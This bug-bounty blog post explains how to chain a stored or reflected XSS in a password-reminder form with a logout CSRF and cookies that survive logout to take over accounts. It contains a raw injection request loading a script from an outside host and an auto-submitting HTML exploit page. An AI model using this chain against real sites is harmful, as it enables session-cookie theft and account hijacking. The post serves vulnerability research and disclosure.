How to use XSS in login form/remember password/registration

So, we have Stored or Reflected Xss in Forgot your password.

But we can not carry out the attack on the user, since this is not a XSS in user account. And if we can not provide the required PoC, this vulnerability provides no threat and can not claim a greater reward in bug bounties!

However, the XSS is a personal account is fairly easy to rotate, and now I tell you how to do it ..

There is a page http://example.com/rememberpassword

There is POST request and not available filtering in email:

POST /rememberpassword HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
formName=rememberpassword&email=”>http://securityz.net/evil.js&humanizm%5Bid%5D=32d2d845d4793a3e75d13d7fc8187aea&humanizm%5Binput%5D=1596

In general, our task – to lure the victim to http://example.com/rememberpassword, run our code and steal her cookies. But this will not work if the victim is in his account.

And here to help us two vulnerabilities.

The first vulnerability – LOGOUT CSRF.
1) The vulnerability lies in the fact that you can LOG OUT the victim without her consent, ie it goes on http://example.com/en/account?option=logout, comes from an account.

To prevent this, for each logout link is attached unique csrf token, such as in social network https://login.vk.com/?act=logout&hash=8b8bcf7f3cbd6d32d5&_origin=https://vk.com .

2) The vulnerability broken authentication & session managament. It lies in the fact that when the victim came out of their account, and then went – cookies have not changed! Dangerous, number 2 https://www.owasp.org/index.php/Top_10_2013-Top_10 , can be used to exploit with other bugs. It is necessary to generate a new cookie values in the new input. We need to test twice – compare cookies to exit after the next login, no one character should not change.
Thus, the second bug, as a passive, nothing with him do not make. And with the first write our automatic CSRF exploit, loaded logout link from victim account in html hat as a picture:

<html>
<head>
<img src=”http://example.com/en/account?option=logout”&gt;
</head>
<body>
<form action=”http://example.com/rememberpassword&#8221; method=”POST”>
<input type=”hidden” name=”formName” value=”rememberpassword” />
<input type=”hidden” name=”email” value=”&lt;script src=&apos;http://securityz.net/evil.js&#8221; />
<input type=”hidden” name=”humanizm[id]” value=”d8ac3bdda21255b54bcdd549bb15962c” />
<input type=”hidden” name=”humanizm[input]” value=”” />
<input type=”submit” id=”qiece” value=”Submit request” />
</form>

document.getElementById(“qiece”).click();

</body>
</html>

Well, our exploit done.

And when we stole victim’s cookies, we are free to login to her account, because COOKIES NOT DESTROY AFTER EXIT!!

Similar vulnerabilities (Logout CSRF/Broken Authentication) caught me everywhere and with their help, with the help of the XSS (is not in the user account) and with the help of sniffer can be easily hacked account (unless, of course, no httpOnly).

If y enjoy this article, subscribe me on twitter https://twitter.com/MaximYaremchuk /retweet and I’m add more articles in the process of research the security of web applications 🙂

#bugbounty #xss #BrokenAuthentication

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s